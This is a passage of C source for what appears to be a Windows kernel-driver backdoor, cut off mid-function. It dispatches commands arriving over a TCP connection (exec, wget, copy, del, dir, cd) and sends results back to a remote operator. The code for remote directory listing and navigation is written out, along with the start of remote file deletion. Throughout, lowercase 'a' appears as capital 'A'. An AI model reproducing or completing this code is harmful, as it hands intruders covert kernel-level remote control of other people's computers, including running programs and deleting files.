📄 command.c
字号:
///
// uty@uaty
///
#include <ntddk.h>
#include "structs.h"
#include "commAnd.h"
#include "utils.h"
NTSTATUS
uSend(
PTCPS_Connection pConnection,
char *pSendBuffer,
ULONG ulSendBufferSize
);
/*
typedef struct FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
typedef struct _FILE_DISPOSITION_INFORMATION {
BOOLEAN DeleteFile;
} FILE_DISPOSITION_INFORMATION;
*/
#define SENDBUFLENGTH 1024
#define MAXPATHLENGTH_W 511*2
#define MAXPATHLENGTH_A 511
#define MAXARGLENGTH_W 255*2
#define MAXARGLENGTH_A 255
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG FileInformationLength,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan
);
NTSYSAPI
NTSTATUS
NTAPI
ZwDeleteFile(
IN POBJECT_ATTRIBUTES ObjectAttributes
);
NTSYSAPI
NTSTATUS
NTAPI
ZwSetInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass
);
NTSYSAPI
NTSTATUS
NTAPI
ZwWriteFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
NTSYSAPI
NTSTATUS
NTAPI
ZwReadFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID Buffer,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL
);
BOOLEAN
KWget(
PCHAR szURL,
PCHAR szFileNAme
);
BOOLEAN
KExec(
PCHAR CmdLine
);
//--------------------------------------------------------------------
//ReferenceCommAnd 不负责释放pRecvList占用的空间
NTSTATUS
ReferenceCommAnd(PRECVLIST pRecvList)
{
CHAR* usAge = "It think the most vAlueAble commAnds Are:\n"
" dir \n"
" cd \n"
" exec \n"
" wget \n"
" copy \n"
" del \n"
" pwd \n"
" chAngedriver \n"
" \n";
ULONG Argc;
CHAR* Argv[9];///9 Arguments is enough
WCHAR *tempforpAth;//equAl to TCPSConnection->m_PAth;
CHAR *AnsiTemp;//finAlly send to client
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
AnsiTemp = ExAllocatePool(PagedPool,SENDBUFLENGTH);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));
DbgPrint("commAndline: %s\n",pRecvList->dAtA);//debug
pRecvList->dAtA[strlen(pRecvList->dAtA)-1] = '\0';//remote the lAst \n
GetArg(pRecvList->dAtA,&Argc,Argv,9);
DbgPrint("Argc: %d\n",Argc);//debug
for(i = 0;i<Argc;i++){
DbgPrint("%s\n",Argv[i]);
}
if(0 == _stricmp(Argv[0],"help")){
uSend(
pRecvList->pConnection,
usAge,
strlen(usAge)
);
}
else if(0 == _stricmp(Argv[0],"dir")){
//参数检查
if(wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth) < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);// \??\m_PAth
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_ReferenceCommAnd;
}
CommAnd_Dir(pRecvList,tempforpAth);
}
else if(0 == _stricmp(Argv[0],"cd")){
CommAnd_Cd(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"exec")){
CommAnd_Exec(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"wget")){
CommAnd_Wget(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"copy")){
CommAnd_Copy(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"del")){
CommAnd_Del(pRecvList,Argc,Argv);
}
else if(0 == _stricmp(Argv[0],"pwd")){
//m_PAth cAnnot big then 512
wtoA((WCHAR*)pRecvList->pConnection->m_PAth,(CHAR*)AnsiTemp);
strcat(AnsiTemp,"\n");////Avoid this situAtion c:u>
uSend(
pRecvList->pConnection,
AnsiTemp,
strlen(AnsiTemp)
);
}
else if(0 == _stricmp(Argv[0],"chAngeDriver")){
CommAnd_ChAngeDriver(pRecvList,Argc,Argv);
}
else if(0 == strcmp(Argv[0],"")){///for the press of enter ,but we remoted it
//do nothing
}
else{
uSend(
pRecvList->pConnection,
"unreferenced commAnd :>\n",
strlen("unreferenced commAnd :>\n")
);
}
end_ReferenceCommAnd:
ExFreePool(tempforpAth);
ExFreePool(AnsiTemp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Dir(PRECVLIST pRecvList,WCHAR* pAth)
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
IO_STATUS_BLOCK IoStAtusBlock;
#define INFORBUFFERLENGTH 1024
CHAR *InforBuffer;
#define TEMPBUFFERLENGTHBYTES 1020 //4 bytes for '\n'
WCHAR *temp;
PFILE_DIRECTORY_INFORMATION pInfor;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
CHAR *SendBuffer;
SendBuffer = ExAllocatePool(PagedPool,SENDBUFLENGTH);
InforBuffer = ExAllocatePool(PagedPool,INFORBUFFERLENGTH);
temp = ExAllocatePool(PagedPool,TEMPBUFFERLENGTHBYTES);
RtlInitUnicodeString(&nAme,pAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",dwStAtus,IoStAtusBlock.Status);
if(dwStAtus == STATUS_PENDING && IoStAtusBlock.Status != STATUS_SUCCESS){///需要改进
uSend(
pRecvList->pConnection,
"error\n",
strlen("error\n")
);
}
do{
RtlZeroMemory(InforBuffer,INFORBUFFERLENGTH);
dwStAtus = ZwQueryDirectoryFile(
hFileHAndle,
NULL,
NULL,
NULL,
&IoStAtusBlock,
InforBuffer,
INFORBUFFERLENGTH,
FileDirectoryInformation,
FALSE,
NULL,
FALSE
);
if (IoStAtusBlock.Status != STATUS_SUCCESS){//bug
uSend(
pRecvList->pConnection,
"bAd directory\n",
strlen("bAd directory\n")
);
goto end_CommAnd_Dir;
}
pInfor = (PFILE_DIRECTORY_INFORMATION)InforBuffer;
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
/////////////给文件夹加标志
if(wcslen(temp) + wcslen(L"\t\t<DIR>") < MAXPATHLENGTH_W){
wcscat(temp,L"\t\t<DIR>");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Dir;
}
////////////
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
wtoA(temp,SendBuffer);
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)
);
//RtlZeroMemory(SendBuffer,1024);//不能在这里清
do{
pInfor = (PFILE_DIRECTORY_INFORMATION)((PCHAR)pInfor + pInfor->NextEntryOffset);
RtlZeroMemory(temp,TEMPBUFFERLENGTHBYTES);
RtlCopyMemory(temp,(char*)pInfor->FileName,pInfor->FileNameLength < TEMPBUFFERLENGTHBYTES ?pInfor->FileNameLength:TEMPBUFFERLENGTHBYTES);
if(pInfor->FileAttributes & FILE_ATTRIBUTE_DIRECTORY){
wcscat(temp,L"\t\t<DIR>");
}else{
//do nothing
}
RtlZeroMemory(SendBuffer,SENDBUFLENGTH);
//don't worry the length here
wtoA(temp,SendBuffer);
strcat(SendBuffer,"\n");
uSend(
pRecvList->pConnection,
SendBuffer,
strlen(SendBuffer)/////
);
//RtlZeroMemory(SendBuffer,1024);//不能在这里清
}while(pInfor->NextEntryOffset != 0);
}while(IoStAtusBlock.Status != STATUS_NO_MORE_FILES);
ZwClose(hFileHAndle);
end_CommAnd_Dir:
ExFreePool(SendBuffer);
ExFreePool(InforBuffer);
ExFreePool(temp);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Cd(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
NTSTATUS dwStAtus;
IO_STATUS_BLOCK IoStAtusBlock;
WCHAR *tempforpAth;
WCHAR *tempforArg;//convert Argv[1] to WCHAR
ULONG i;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
if(Argc < 2){
//do nothing
goto end_CommAnd_Cd;
}
if(Argc > 2){
uSend(
pRecvList->pConnection,
"too mAny Arguments\n",
strlen("too mAny Arguments\n")
);
goto end_CommAnd_Cd;
}
if(0 == strcmp(Argv[1],"..")){ //cd ..
for (i = wcslen(pRecvList->pConnection->m_PAth);i > 0;i--){
if(pRecvList->pConnection->m_PAth[i] == L'\\'){//Add L, whAtever
pRecvList->pConnection->m_PAth[i] = L'\0';
if(wcslen(pRecvList->pConnection->m_PAth) == 2){//x:
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}
}
}
return STATUS_SUCCESS;
}
if(0 == strcmp(Argv[1],"\\")){ //cd \
pRecvList->pConnection->m_PAth[3] = L'\0';
goto end_CommAnd_Cd;
}
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
if(strlen(Argv[1]) < MAXARGLENGTH_A){
Atow(Argv[1],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//sprintf(tempforpAth,L"\\??\\%S\\%S",pRecvList->pConnection->m_PAth,tempforArg);
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));//not wcslen
if ((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W ){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
//wcscat(tempforpAth,L"\\");// \ 另加
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
DbgPrint("cd PAth: %S\n",tempforpAth);//debug
RtlInitUnicodeString(&nAme,tempforpAth);
InitializeObjectAttributes(
&oA,
&nAme,
OBJ_CASE_INSENSITIVE,
NULL,
NULL
);
dwStAtus = ZwOpenFile(
&hFileHAndle,
GENERIC_READ,
&oA,
&IoStAtusBlock,
FILE_SHARE_READ,
FILE_DIRECTORY_FILE
);
DbgPrint("dwStAtus: 0x%x\n",dwStAtus);//debug
DbgPrint("IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug
if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){//需要改进
uSend(
pRecvList->pConnection,
"direcotry does not exists\n",
strlen("direcotry does not exists\n")
);
}else{
if((wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg) + 2 )*2 < MAXPATHLENGTH_W){//1 for L"\\"
wcscat(pRecvList->pConnection->m_PAth,tempforArg);
wcscat(pRecvList->pConnection->m_PAth,L"\\");
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Cd;
}
}
ZwClose(hFileHAndle);
end_CommAnd_Cd:
ExFreePool(tempforpAth);
ExFreePool(tempforArg);
return STATUS_SUCCESS;
}
//--------------------------------------------------------------------
NTSTATUS CommAnd_Del(PRECVLIST pRecvList,ULONG Argc,CHAR* Argv[])
{
HANDLE hFileHAndle;
OBJECT_ATTRIBUTES oA;
UNICODE_STRING nAme;
IO_STATUS_BLOCK IoStAtusBlock;
NTSTATUS dwStAtus;
WCHAR *tempforpAth;
WCHAR *tempforArg;
ULONG i;
FILE_BASIC_INFORMATION fileBAsicInfor= {0};
FILE_DISPOSITION_INFORMATION fileDispositionInfor;
tempforpAth = ExAllocatePool(PagedPool,MAXPATHLENGTH_W);
tempforArg = ExAllocatePool(PagedPool,MAXARGLENGTH_W);
for(i = 1;i < Argc;i++){
RtlZeroMemory(tempforArg,MAXARGLENGTH_W);
//check the Arg,
if (strlen(Argv[i]) < MAXARGLENGTH_A){
Atow(Argv[i],tempforArg);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
RtlZeroMemory(tempforpAth,MAXPATHLENGTH_W);
RtlCopyMemory(tempforpAth,L"\\??\\",sizeof(L"\\??\\"));
//check the Arg
if((wcslen(tempforpAth) + wcslen(pRecvList->pConnection->m_PAth))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,pRecvList->pConnection->m_PAth);
}else{
uSend(
pRecvList->pConnection,
"hAy! file nAme is too long,do you wAnnA A overflow?\n",
strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n")
);
goto end_CommAnd_Del;
}
if((wcslen(tempforpAth) + wcslen(tempforArg))*2 < MAXPATHLENGTH_W){
wcscat(tempforpAth,tempforArg);
}else{
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -